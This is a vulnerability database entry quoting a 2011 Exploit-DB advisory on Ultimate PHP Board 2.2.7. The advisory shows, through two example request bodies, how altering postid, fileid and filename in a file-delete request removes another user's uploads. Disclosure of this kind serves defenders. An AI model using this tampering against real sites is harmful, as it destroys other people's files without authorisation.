Ultimate PHP Board 2.2.7 "Broken Authentication and Session Management"

vendor:

Ultimate PHP Board

by:

i2sec - Gi bum Hong

7.5

CVSS

HIGH

Broken Authentication and Session Management

287

CWE

Product Name: Ultimate PHP Board

Affected Version From: 2.2.2007

Affected Version To: 2.2.2007

Patch Exists: NO

Related CWE: N/A

CPE: a:textmb:ultimate_php_board:2.2.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apache 2.2.14, MySQL 5.1.39, PHP 5.2.12

2011

Ultimate PHP Board 2.2.7 “Broken Authentication and Session Management”

This vulnerability allows an attacker to delete another user's upload file by changing the request message to attacking file's post ID and file ID/name.

Mitigation:

Ensure that authentication and session management mechanisms are properly implemented and enforced.

Source

Exploit-DB raw data:

# Exploit Title : Ultimate PHP Board 2.2.7 "Broken Authentication and Session Management"
# Date : 2011.05.17
# Author : i2sec - Gi bum Hong
# Software Link : http://sourceforge.net/projects/textmb/files/UPB/UPB%202.2.7/
# Version : 2.2.7
# Tested on : apache 2.2.14 | mysql 5.1.39 | php 5.2.12

This Vulnerabibity Web base on "Broken Authentication and Session Management".
This attack can delete another user's(ex.admin) upload file.

step1.
Analyze request message of file delete using Paros Tool.
ex) http-request-message body : ~&postid=2&~~&threadid=1&divname=1-1-2-attach&fileid=3&filename=file.txt~

step2.
Change request message to attacking file's post ID and file ID/name.
ex) http-request-message body : ~&postid=1&~~&threadid=1&divname=1-1-1-attach&fileid=2&filename=account.txt~

Full Advisory: http://www.exploit-db.com/docs/17307.pdf